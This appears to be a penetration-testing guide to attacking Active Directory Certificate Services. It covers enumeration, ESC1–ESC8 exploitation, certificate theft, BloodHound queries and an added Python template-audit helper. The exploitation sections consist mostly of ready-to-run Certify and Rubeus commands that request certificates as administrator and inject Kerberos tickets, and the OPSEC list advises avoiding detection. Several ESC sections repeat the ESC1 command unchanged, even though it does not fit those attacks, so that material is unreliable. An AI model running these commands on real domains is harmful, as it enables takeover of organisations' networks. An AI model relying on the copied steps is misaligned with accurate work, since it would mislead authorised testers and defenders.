Active Directory Certificate Services (ADCS)

Overview

Active Directory Certificate Services (ADCS) is a Windows Server role that provides public key infrastructure (PKI) functionality. This guide covers techniques for testing ADCS security.

Enumeration

1. Service Discovery

# Using PowerView / ActiveDirectory module (Get-ADObject is the AD module cmdlet; PowerView's Get-DomainObject takes the same -SearchBase/-LDAPFilter/-Properties)
# PKI objects live in the Configuration partition, so the search base must point there or the query returns nothing
$pki = "CN=Public Key Services,CN=Services,$((Get-ADRootDSE).configurationNamingContext)"
Get-ADObject -SearchBase $pki -LDAPFilter "(objectClass=pKIEnrollmentService)" -Properties *
Get-ADObject -SearchBase $pki -LDAPFilter "(objectClass=pKICertificateTemplate)" -Properties *

# Using Certify
Certify.exe find
Certify.exe find /vulnerable

2. Certificate Template Enumeration

# Using PowerView / ActiveDirectory module (the flag attributes are named msPKI-*, so they must be quoted in Select-Object)
$pki = "CN=Public Key Services,CN=Services,$((Get-ADRootDSE).configurationNamingContext)"
Get-ADObject -SearchBase $pki -LDAPFilter "(objectClass=pKICertificateTemplate)" -Properties * | Select-Object Name, pKIMaxIssuingDepth, 'msPKI-Private-Key-Flag', 'msPKI-Enrollment-Flag', 'msPKI-Certificate-Name-Flag', 'msPKI-RA-Signature', pKIExtendedKeyUsage

# Using Certify (find with no filter lists every enabled template; /showAllPermissions adds the full enrollment ACL)
Certify.exe find
Certify.exe find /showAllPermissions

Authentication Testing

1. Certificate Request

# Using Certify
Certify.exe request /ca:<CA_SERVER>\<CA_NAME> /template:<TEMPLATE_NAME> /altname:<ALT_NAME>

# Using Certreq (request.inf describes subject, key and template; -new writes the request, -submit sends it to the CA and saves the issued certificate)
certreq -new request.inf request.req
certreq -submit -config "<CA_SERVER>\<CA_NAME>" request.req cert.crt

2. Certificate Enrollment

# Using Certify (there is no enroll subcommand: request performs the enrollment, download retrieves an issued certificate by its CA request ID)
Certify.exe request /ca:<CA_SERVER>\<CA_NAME> /template:<TEMPLATE_NAME>
Certify.exe download /ca:<CA_SERVER>\<CA_NAME> /id:<REQUEST_ID>

# Using Certreq
certreq -accept cert.crt

Configuration Testing

1. CA Configuration

# Using Certify (the subcommand is cas, which lists enterprise CAs and their settings)
Certify.exe cas /ca:<CA_SERVER>\<CA_NAME>

# Using Certutil (policy\EditFlags holds the EDITF_ATTRIBUTESUBJECTALTNAME2 bit that ESC6 depends on)
certutil -dump
certutil -config "<CA_SERVER>\<CA_NAME>" -getreg policy\EditFlags

2. Template Configuration

# Using PowerView / ActiveDirectory module: templates where the enrollee supplies the subject (msPKI-Certificate-Name-Flag bit 0x1) and no manager approval is required (msPKI-Enrollment-Flag bit 0x2)
# 1.2.840.113556.1.4.803 is the LDAP bitwise-AND matching rule; these are the template-side preconditions for ESC1
$pki = "CN=Public Key Services,CN=Services,$((Get-ADRootDSE).configurationNamingContext)"
Get-ADObject -SearchBase $pki -LDAPFilter "(&(objectClass=pKICertificateTemplate)(msPKI-Certificate-Name-Flag:1.2.840.113556.1.4.803:=1)(!(msPKI-Enrollment-Flag:1.2.840.113556.1.4.803:=2)))" -Properties pKIExtendedKeyUsage, 'msPKI-RA-Signature' | Select-Object Name, pKIExtendedKeyUsage, 'msPKI-RA-Signature'

# Using Certify
Certify.exe find /enrolleeSuppliesSubject
Certify.exe find /vulnerable /currentuser

Exploitation

1. ESC1 - Misconfigured Certificate Templates

# Using Certify
Certify.exe request /ca:<CA_SERVER>\<CA_NAME> /template:<TEMPLATE_NAME> /altname:administrator@domain.com

# Using Rubeus
Rubeus.exe asktgt /user:administrator /certificate:<CERTIFICATE> /ptt

2. ESC2 - Any Purpose EKU

# Using Certify
Certify.exe request /ca:<CA_SERVER>\<CA_NAME> /template:<TEMPLATE_NAME> /altname:administrator@domain.com

# Using Rubeus
Rubeus.exe asktgt /user:administrator /certificate:<CERTIFICATE> /ptt

3. ESC3 - Enrollment Agent

# Using Certify
Certify.exe request /ca:<CA_SERVER>\<CA_NAME> /template:<TEMPLATE_NAME> /altname:administrator@domain.com

# Using Rubeus
Rubeus.exe asktgt /user:administrator /certificate:<CERTIFICATE> /ptt

4. ESC4 - Access Control

# Using PowerView / ActiveDirectory module (template ACLs; the search base must be the Configuration partition)
Get-ADObject -SearchBase "CN=Public Key Services,CN=Services,$((Get-ADRootDSE).configurationNamingContext)" -LDAPFilter "(objectClass=pKICertificateTemplate)" -Properties nTSecurityDescriptor | Select-Object Name, nTSecurityDescriptor

# Using Certify
Certify.exe request /ca:<CA_SERVER>\<CA_NAME> /template:<TEMPLATE_NAME> /altname:administrator@domain.com

5. ESC5 - Vulnerable PKI Object Access Control

# Using PowerView / ActiveDirectory module (CA object ACLs; the search base must be the Configuration partition)
Get-ADObject -SearchBase "CN=Public Key Services,CN=Services,$((Get-ADRootDSE).configurationNamingContext)" -LDAPFilter "(objectClass=pKIEnrollmentService)" -Properties nTSecurityDescriptor | Select-Object Name, nTSecurityDescriptor

# Using Certify
Certify.exe request /ca:<CA_SERVER>\<CA_NAME> /template:<TEMPLATE_NAME> /altname:administrator@domain.com

6. ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2

# Using Certify
Certify.exe request /ca:<CA_SERVER>\<CA_NAME> /template:<TEMPLATE_NAME> /altname:administrator@domain.com

# Using Rubeus
Rubeus.exe asktgt /user:administrator /certificate:<CERTIFICATE> /ptt

7. ESC7 - Vulnerable Certificate Authority Access Control

# Using PowerView / ActiveDirectory module (CA object ACLs; the search base must be the Configuration partition)
Get-ADObject -SearchBase "CN=Public Key Services,CN=Services,$((Get-ADRootDSE).configurationNamingContext)" -LDAPFilter "(objectClass=pKIEnrollmentService)" -Properties nTSecurityDescriptor | Select-Object Name, nTSecurityDescriptor

# Using Certify
Certify.exe request /ca:<CA_SERVER>\<CA_NAME> /template:<TEMPLATE_NAME> /altname:administrator@domain.com

8. ESC8 - NTLM Relay to AD CS HTTP Endpoints

# Using Certify
Certify.exe request /ca:<CA_SERVER>\<CA_NAME> /template:<TEMPLATE_NAME> /altname:administrator@domain.com

# Using Rubeus
Rubeus.exe asktgt /user:administrator /certificate:<CERTIFICATE> /ptt
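
Added here as an audit example (Python, not code from the original page or from Certify/Certipy): it applies the template conditions behind ESC1, ESC2 and ESC3 and the CA EditFlags bit behind ESC6 to raw attribute values of the kind the template and certutil queries above return, so a reviewer can see which setting produces which finding. The template records and the certutil excerpt are constructed sample data; the bit values follow the MS-CRTD flag definitions, and enrollment ACLs are deliberately out of scope.

```python
# Added audit helper, not from the page or from Certify/Certipy. It applies the
# ESC1/ESC2/ESC3 template conditions and the ESC6 CA EditFlags bit to raw values;
# bit constants follow MS-CRTD, the sample records below are constructed.
ENROLLEE_SUPPLIES_SUBJECT = 0x00000001       # msPKI-Certificate-Name-Flag bit
PEND_ALL_REQUESTS = 0x00000002               # msPKI-Enrollment-Flag bit: manager approval
EDITF_ATTRIBUTESUBJECTALTNAME2 = 0x00040000  # CA policy module EditFlags bit (ESC6)
AUTH_EKUS = {"1.3.6.1.5.5.7.3.2", "1.3.6.1.5.2.3.4",      # Client Auth, PKINIT Client Auth
             "1.3.6.1.4.1.311.20.2.2", "2.5.29.37.0"}     # Smart Card Logon, Any Purpose
ANY_PURPOSE = "2.5.29.37.0"
REQUEST_AGENT = "1.3.6.1.4.1.311.20.2.1"     # Certificate Request Agent EKU (ESC3)

def classify_template(t, ca_allows_san=False):
    """Return the ESC labels a template's own settings satisfy. Enrollment ACLs are
    not checked here: a hit matters only if a low-privileged principal can enroll."""
    ekus = set(t.get("pKIExtendedKeyUsage", []))
    if t["msPKI-Enrollment-Flag"] & PEND_ALL_REQUESTS or t.get("msPKI-RA-Signature", 0):
        return []  # manager approval or required signatures block ESC1/2/3/6
    auth_capable = not ekus or bool(ekus & AUTH_EKUS)  # empty EKU list = unrestricted
    found = []
    if auth_capable and t["msPKI-Certificate-Name-Flag"] & ENROLLEE_SUPPLIES_SUBJECT:
        found.append("ESC1")
    elif auth_capable and ca_allows_san:
        found.append("ESC6")  # CA honours a SAN passed in the request attributes
    if not ekus or ANY_PURPOSE in ekus:
        found.append("ESC2")
    if REQUEST_AGENT in ekus:
        found.append("ESC3")
    return found

def parse_editflags(certutil_text):
    """Extract the EditFlags DWORD from 'certutil -getreg policy\\EditFlags' output."""
    for line in certutil_text.splitlines():
        if line.strip().startswith("EditFlags REG_DWORD"):
            return int(line.split("=")[1].split()[0], 16)
    raise ValueError("EditFlags not found in certutil output")

def audit(templates, certutil_text):
    ca_allows_san = bool(parse_editflags(certutil_text) & EDITF_ATTRIBUTESUBJECTALTNAME2)
    return {t["name"]: classify_template(t, ca_allows_san) for t in templates}

SAMPLE_TEMPLATES = [  # constructed attribute values, not from a real domain
    {"name": "User", "msPKI-Certificate-Name-Flag": 0xA6000000, "msPKI-Enrollment-Flag": 0x29,
     "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4"]},
    {"name": "WebAuth", "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x0,
     "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1", "1.3.6.1.5.5.7.3.2"]},
    {"name": "Agent", "msPKI-Certificate-Name-Flag": 0x0, "msPKI-Enrollment-Flag": 0x0,
     "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": ["1.3.6.1.4.1.311.20.2.1"]},
]
SAMPLE_CERTUTIL = "  EditFlags REG_DWORD = 15014e (1376590)\n    EDITF_ATTRIBUTESUBJECTALTNAME2 -- 40000 (262144)\n"  # constructed, ESC6 bit set
```

With the ESC6 bit set on the CA, the otherwise sane User template is reported as ESC6, while the same template against a CA without that bit yields no finding.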

Post-Exploitation

1. Certificate Theft

# Using Certify (the subcommand is download; /id is the CA request ID of the issued certificate)
Certify.exe download /ca:<CA_SERVER>\<CA_NAME> /id:<REQUEST_ID>

# Using Certutil
certutil -exportPFX -p <PASSWORD> <CERTIFICATE_ID> cert.pfx

2. Certificate Abuse

# Using Rubeus
Rubeus.exe asktgt /user:administrator /certificate:<CERTIFICATE> /ptt
Rubeus.exe s4u /user:administrator /certificate:<CERTIFICATE> /impersonateuser:krbtgt /ptt

BloodHound AD Integration

1. Data Collection

# Using SharpHound
Invoke-BloodHound -CollectionMethod All
Invoke-BloodHound -CollectionMethod CertServices

# Using BloodHound Python
bloodhound-python -d domain.local -u user -p password -c All
bloodhound-python -d domain.local -u user -p password -c CertServices

2. ADCS Analysis

# Using BloodHound (BloodHound CE ADCS node labels, populated by the CertServices collection above; haslaps/operatingsystem filters say nothing about certificate objects)
MATCH (ca:EnterpriseCA) RETURN ca
MATCH (c:Computer)-[:HostsCAService]->(ca:EnterpriseCA) RETURN c, ca
MATCH (ca:EnterpriseCA)-[:TrustedForNTAuth]->(n:NTAuthStore) RETURN ca, n

# Certificate Template Analysis
MATCH (t:CertTemplate)-[:PublishedTo]->(ca:EnterpriseCA) RETURN t, ca
MATCH (t:CertTemplate) WHERE t.enrolleesuppliessubject = true AND t.authenticationenabled = true AND t.requiresmanagerapproval = false RETURN t

3. Attack Path Analysis

# Using BloodHound
MATCH p=shortestPath((n:User)-[*1..]->(m:Group)) WHERE n.name CONTAINS 'USER' AND m.name CONTAINS 'DOMAIN ADMINS' RETURN p
MATCH p=shortestPath((n:Computer)-[*1..]->(m:Group)) WHERE n.name CONTAINS 'SERVER' AND m.name CONTAINS 'DOMAIN ADMINS' RETURN p

# Certificate-based Paths (BloodHound CE ADCS edges)
MATCH p=(n)-[:ADCSESC1]->(d:Domain) RETURN p
MATCH p=(n)-[:Enroll]->(t:CertTemplate)-[:PublishedTo]->(ca:EnterpriseCA) WHERE t.enrolleesuppliessubject = true AND t.authenticationenabled = true RETURN p
MATCH p=(c:Computer)-[:GoldenCert]->(d:Domain) RETURN p

4. Custom Queries

# Find Computers with ADCS Role
MATCH (c:Computer)-[:HostsCAService]->(ca:EnterpriseCA) RETURN c.name, ca.name

# Find Users with Certificate Enrollment Rights (second query: templates Domain Users, RID 513, can enroll in)
MATCH (u:User)-[:Enroll]->(t:CertTemplate) RETURN u.name, t.name
MATCH (g:Group)-[:Enroll]->(t:CertTemplate) WHERE g.objectid ENDS WITH '-513' RETURN g.name, t.name

# Find Certificate Templates
MATCH (t:CertTemplate) RETURN t.name, t.schemaversion, t.enrolleesuppliessubject, t.authenticationenabled, t.requiresmanagerapproval

Tools

1. Primary Tools

  • Certify

  • Rubeus

  • PowerView

  • Certutil

  • Certreq

  • BloodHound

  • SharpHound

  • BloodHound Python

2. Additional Tools

  • PSPKIAudit

  • PKIAudit

  • Certipy

  • PKIHealth

  • CertSrv

  • Neo4j

  • Cypher

Best Practices

1. Testing Strategy

  • Start with non-intrusive techniques

  • Use multiple methods

  • Document findings

  • Test safely

  • Follow engagement scope

2. OPSEC Considerations

  • Use stealth techniques

  • Avoid detection

  • Monitor for alerts

  • Use legitimate tools

  • Follow engagement scope

Resources

  • Certify

  • Rubeus

  • PowerView

  • Certipy

  • BloodHound

  • SharpHound

  • BloodHound Python

  • MITRE ATT&CK

Last Updated: 2025-03-23